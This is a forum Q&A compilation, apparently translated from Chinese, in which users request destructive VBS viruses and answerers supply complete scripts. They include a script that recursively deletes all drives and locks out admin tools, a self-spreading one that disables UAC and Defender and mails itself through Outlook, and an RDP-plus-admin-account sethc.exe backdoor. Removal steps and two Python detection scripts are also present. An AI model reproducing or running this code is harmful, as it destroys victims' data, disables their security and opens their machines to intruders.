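Looking for the most complete VBS virus code; it has to be destructive. Thanks, I'll give extra points for a good answer.
No more small talk then. How about this one? Ask me if there is anything you don't understand.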
On Error Resume Next
dim avest,xufso,wscrt
Set avest = WScript.Createobject("WScript.Shell")
Set wscrt = WScript.Createobject("WScript.Shell")
Set xufso = CreateObject("Scripting.FileSystemObject")
avest.run "cmd /c ""del d:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del e:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del f:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del g:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del h:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del i:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del j:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del k:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del l:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del m:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del n:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del o:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del p:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del q:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del r:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del s:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del t:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del u:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del v:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del w:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del x:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del y:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del z:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del C:\Users\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del C:\ProgramData\*.* / f /q /s""",0 ,true
xufso.CreateFolder "C:\VBScript\"
wscrt.run "shutdown -r -f -t 3600 -c 脚本与批处理程序相结合成功!"
xufso.copyfile Wscript.Scriptfullname,"C:\VBScript\一触即发.vbs"
xufso.copyfile Wscript.Scriptfullname,"C:\Users\Public\Desktop\一触即发.vbs"
wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000001","REG_DWORD"
wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000001","REG_DWORD"
wscrt.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","C:\VBScript\一触即发.vbs","REG_SZ"
wscrt.regWrite"HKEY_CURRENT_USER\Software\Policies\Microsoft\MMC\RestrictToPermittedSnapins","00000001","REG_DWORD"
msgbox "My head with day feet standing on the earth all over the world to worship my swagger is the modelling of the legendary Super Star elder brother is sharp!",16+4096,"Error"
do
wscrt.run "ping 192.168.1.1 -l 65500 -t"
loop
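VBS code collection
Haha, the poster above is pretty funny.
First, about VBS:
I study VB. Reportedly VB and VBS are not very different; it's just that VBS has no main window,
VB's network support is practically perfect, which is why quite a few account-stealing programs are written in VB, but the amount of code is definitely not something we can post on Baidu, and... and so on. In short, posting the code is not possible.
Now about the code:
Don't complain that the poster above gave too little. His is non-toxic and harmless, and it works quite well on people who don't understand operating systems.
If you think it is too little, make this file a startup entry in the registry so that it starts at boot, heh.
If that still isn't enough for you, change it like this: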
Msgbox "您的系统已遭病毒破坏,系统5秒后将自动关机关机,请在关机后24小时重新启动。",16+4096,"Windows安全警报"
Shell "cmd/c shutdown -s -t 5"
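Buddha says: deliver all living beings. This will do.
The last line of code is the one that shuts the machine down. You should know how to insert VBS code, right?
Create a text document
Enter the code
Change the .txt extension to .vbs
Double-click to run
Looking for an extremely vicious VBS script, preferably one that can wreck the computer and cannot be repaired even in Safe Mode. It has to be extremely vicious.
Here you go.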
On Error Resume Next
set fso=createobject("scripting.filesystemobject")
set vbs=wscript.createobject("wscript.shell")
pt=vbs.specialfolders("startup") "\"
set file=fso.getfile(wscript.scriptfullname)
file.copy pt
set fso=createobject("scripting.filesystemobject")
set vbs=wscript.createobject("wscript.shell")
pt=vbs.specialfolders(1) "\"
set file=fso.getfile(wscript.scriptfullname)
file.copy pt
set ws=wscript.createobject("wscript.shell")
ws.popup "正在验证I/O接口...",3,"接口工具",vbinformation
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetup",1,"REG_DWORD"
if err.number0 then
On Error Goto 0
err.raise 1,"无法匹配的I/O接口,请以ADMINISTRATOR用户运行重试","Access failed (no permission)"
end if
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\[TARGETDIR]脚本病毒加强版.vbs","RUNASADMIN","REG_SZ"
ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin",0,"REG_DWORD"
ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",0,"REG_DWORD"
ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop",0,"REG_DWORD"
ws.run "cmd /c echo 0C:\Windows\Web\Screen\e.bmp"
Set ol=CreateObject("Out"+"look"+".Application")
For x=1 To 100
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="工作报告"
Mail.Body="您好,这是今月的工作报告"
Mail.Attachments.Add(dir2"Win32system.vbs")
Mail.Send
Next
ol.Quit
ws.run "cmd /c echo Your Computer Has Been Destoryed!e.txt"
ws.run "cmd /c echo Your Computer Has Been Destoryed!c:\e.txt"
wscript.sleep 2000
ws.regwrite "HKCU\Control Panel\Desktop\wallpaper","C:\Windows\Web\Screen\e.bmp","REG_SZ"
ws.run "RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters"
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetup",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetupIDPage",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetupSecurityPage",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoEntireNetwork",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoWorkgroupContents",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoFileSharingControl",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoPrintSharingControl",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CLASSES_ROOT\directory\background\ShellEx\ContextMenuHandlers\New\",0,"REG_SZ"
wscript.sleep 100
ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService\Start",4,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\noclose","1","REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoChangeStartMenu",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrivers",67108863,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent",0,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies\WriteProtect",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\StartMenuLogOff",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskbar",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWindowsUpdate",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetActiveDesktop",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktopChanges",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Nodesktop",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoAddPrinter",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDeletePrinter",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinterTabs",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\ControlPanel\Desktop\CoolSwitch",0,"REG_SZ"
wscript.sleep 100
ws.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive",67108863,"REG_DWORD"
ws.run "cmd /c taskkill /f /im explorer.exe"
wscript.sleep 3000
ws.run "cmd /c start explorer.exe"
wscript.sleep 2000
ws.regwrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD","2","REG_DWORD"
wscript.sleep 100
set vbs=wscript.createobject("wscript.shell")
set ws=createobject("wscript.shell")
do
msgbox"你好",vbexclamation,"VIRUS"
wscript.sleep 5000
loop
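How to deal with a VBS virus on your computer
VBS viruses are written in VB Script. This scripting language is very powerful: exploiting the openness of the Windows system and calling ready-made Windows objects and components, such scripts can directly control the file system, the registry and so on. You could say a virus is an idea, and that idea becomes extremely easy to implement in VBS. VBS script viruses have the following characteristics:
Simple to write, highly destructive, highly infectious, widely spread, many variants, highly deceptive; they can spread through e-mail attachments; through LAN shares; by infecting web page files such as htm, asp, jsp and php; and through IRC chat channels.
A VBS script virus generally infects files directly by copying itself. Most of the virus's code can be appended directly into the middle of other programs of the same type, and an infected computer will have .vbs, autorun.exe and similar files generated under each drive letter. Below I describe one successful manual removal of a VBS virus, just for the sake of sharing!
In the system's resource manager you can see a wscript.exe process that is always present, and the machine also feels very sluggish...
Step 1: Restrict the wscript.exe process from running. Go to "Start > Run", type gpedit.msc, then open "Computer Configuration > Windows Settings > Security Settings > Software Restriction Policies", right-click and choose "Create New Policies", select "Additional Rules", right-click an empty area in the right pane, choose "New Path Rule" from the menu, browse to wscript.exe in the C:\Windows\System32 folder, and set its security level to "Disallowed". With that we have successfully restricted wscript.exe from running.
Step 2: Using Task Manager or another tool, end the wscript.exe process.
Step 3: Using the tool IceSword, delete the .VBS, .vbe, js, autorun and similar files under each drive letter.
Step 4: Search the system directories for any remaining .VBS, .vbe, js and similar files and delete any you find. Then check the system's startup items for unknown entries and delete those as well!
Step 5: Restart the computer. The .VBS and similar files are gone from every drive letter, and the system is back to normal.
At this point the VBS virus has been removed successfully! To sum up, the key is to restrict the VBS virus from running; only once it has been restricted can the later deletion work proceed normally.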
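Can anyone give me the most complete VBS virus code? It has to be destructive. I'll give extra points, provided the answer is satisfactory.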
Explain the code of a VBS script virus
'Error tolerance
on error resume next
'Define a constant; it is a registry key value
const HKEY_LOCAL_MACHINE = H80000002
'Define a variable strComputer with the value .
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
strComputer "\root\default:StdRegProv")
'Create a component; it is the registry component
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
'The section above opens port 3389, that is, it enables the remote terminal, by modifying registry values
'Error tolerance
on error resume next
'Define the variables username and password
dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os"/"username",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath
'This section adds an administrator; the user name is HackEr and the password is 393214425
'Error tolerance
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exeecho y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F? %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe? %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exedel %SystemRoot%\system32\sethc.exeren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)
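'This section leaves a backdoor, the Magnifier backdoor: it replaces sethc.exe with cmd.exe, so pressing Shift five times at the logon screen brings up a cmd window, after which adding a user is enough to log in to the system
Summary: this does not really count as a virus; at most it is just a backdoor program. After it runs, the system's remote terminal is enabled, an account named HackEr is added automatically, and a Magnifier backdoor is added automatically.
Personally I think this code is three pieces stitched together - - no technical skill in it.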
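For triaging a script like the ones posted above without running it, a static check for the behaviours they show can be written as follows. This is an added example, not code from the thread; the rule names, the `triage` function and the sample text are constructed for illustration, and the patterns only cover indicators that appear on this page.

```python
import re

# Behaviours seen in the scripts on this page; input is lower-cased before matching.
RULES = {
    "run-key or Startup-folder persistence":
        r'currentversion\\run\\|specialfolders\(\s*"startup"',
    "locks out admin tools": r'disable(taskmgr|registrytools|regedit|cmd)\b',
    "weakens UAC or Defender":
        r'enablelua|consentpromptbehavioradmin|disableantispyware|securityhealthservice',
    "enables Remote Desktop": r'fdenytsconnections',
    "creates a local account": r'\.create\(\s*"user"|administrators,group',
    "touches sethc.exe (logon-screen backdoor)": r'sethc\.exe',
    "recursive delete": r'\bdel\s+\S+.*/\s*s\b',
    "mails itself via Outlook": r'outlook\.application|addressentries',
    "forced shutdown": r'shutdown(\.exe)?\s+[-/][sr]\b',
}
COMPILED = {name: re.compile(pattern) for name, pattern in RULES.items()}

# "Out"+"look" style splitting hides strings from naive search; rejoin literals first.
CONCAT = re.compile(r'"\s*[+&]\s*"')

def triage(script_text):
    """Return {behaviour: [line numbers]} for every rule that fires."""
    hits = {}
    for lineno, raw in enumerate(script_text.splitlines(), 1):
        line = raw.strip()
        if line.startswith("'") or line.lower().startswith("rem "):
            continue  # whole-line comment, not executed
        line = CONCAT.sub("", line).lower()
        for name, pattern in COMPILED.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

# Constructed sample assembled from fragments like those in the thread.
SAMPLE = r"""'this comment mentions sethc.exe and must not count
Set ws = CreateObject("WScript.Shell")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\demo","C:\demo\demo.vbs","REG_SZ"
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\Disable" & "TaskMgr",1,"REG_DWORD"
Set ol = CreateObject("Out"+"look"+".Application")
MsgBox "hello"
"""

if __name__ == "__main__":
    for behaviour, lines in triage(SAMPLE).items():
        print(f"{behaviour}: lines {lines}")
```
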
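My computer has a .vbs virus. Experts, please translate this code:
Haha, a boring, simple prank VBS script. Let me translate it for you; I've added some comments, so you'll understand it at a glance.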
Dim HFWsr : Dim HFWfk : Dim HFWfw : Dim FwriteText : Dim HFWfp
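HFWfp="C:\HFWkill.vbs" 'This first defines the file name of the prank script and assigns it to a variable for later use
set HFWsr=CreateObject("wscript.shell") 'Create the Wscript object
set HFWfk=CreateObject("Scripting.FileSystemObject") 'This object is used for the file operations below
Set HFWfw = HFWfk.CreateTextFile(HFWfp, true, false) 'From here it prepares to create the new prank script HFWkill.vbs
HFWsr.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KILLHFW","C:\HFWKILL.VBS","REG_SZ" 'This sets the VBS program that this program creates in the root of drive C to run automatically at startup
FwriteText = "dim HFWkill:set HFWkill=CreateObject(""Wscript.shell""):HFWkill.run ""shutdown -s -t 0 -f"",0" 'The main thing is that this shutdown code is written into the newly created VBS file
HFWfw.write FwriteText:HFWfw.close 'Creation finished
HFWsr.run "attrib +h +r +s c:\hfwkill.vbs",0 'Marks the prank file as hidden, read-only and system
msgbox "o(∩_∩)...! I LOVE YOU ! 你挂了...哈哈哈",0,"H*F*W" 'Here it smugly tells you that it has succeeded
HFWsr.run "shutdown -s -t 0 -f", 0 'This shuts your machine down once right away; after that it shuts down every time you boot. That is all there is to this simple little prank script!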
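If you are already "infected", boot into Safe Mode, type "RegEdit" in Run to open the registry, then delete the "KILLHFW" entry under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\. It is also best to delete the HFWKILL.VBS file in the root of drive C; of course, to delete this file you first have to enable showing hidden and system files. If you are familiar with DOS, typing Del c:\HFWKILL.VBS in a CMD window also works.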
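The startup-item check described in the cleanup answers can be done from saved `reg query` output instead of browsing RegEdit by hand. The following is an added example, not part of the original answers; the function name and the sample output are constructed, with the two flagged entries taken from the scripts quoted on this page.

```python
import re

# One value line of `reg query` output: 4 spaces, name, 4 spaces, type, 4 spaces, data.
VALUE_LINE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$")
SCRIPT_FILE = re.compile(r"\.(vbs|vbe|js|jse|wsf)\b")
SCRIPT_HOST = re.compile(r"\b(wscript|cscript)(\.exe)?\b")

def suspicious_run_entries(reg_query_output):
    """Return (key, value name, data, reason) for Run values that start a script."""
    findings, key = [], None
    for line in reg_query_output.splitlines():
        if line.upper().startswith("HKEY_"):
            key = line.strip()          # header line naming the key being listed
            continue
        m = VALUE_LINE.match(line)
        if not m or m["type"] not in ("REG_SZ", "REG_EXPAND_SZ"):
            continue
        data = m["data"].strip()
        lowered = data.lower()
        if SCRIPT_FILE.search(lowered):
            reason = "launches a script file at logon"
        elif SCRIPT_HOST.search(lowered):
            reason = "invokes Windows Script Host at logon"
        else:
            continue
        findings.append((key, m["name"], data, reason))
    return findings

# Constructed sample in the layout `reg query` prints.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    KILLHFW    REG_SZ    C:\HFWKILL.VBS

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    svchost    REG_SZ    C:\VBScript\一触即发.vbs
    Backup Tool    REG_SZ    "C:\Program Files\Backup\backup.exe" /silent
"""

if __name__ == "__main__":
    for key, name, data, reason in suspicious_run_entries(SAMPLE):
        print(f"{key}\\{name} -> {data} ({reason})")
```

On a live system the input would be the saved output of `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` and the matching HKCU key; each flagged value and the file it points to are the items to delete, as the answers describe.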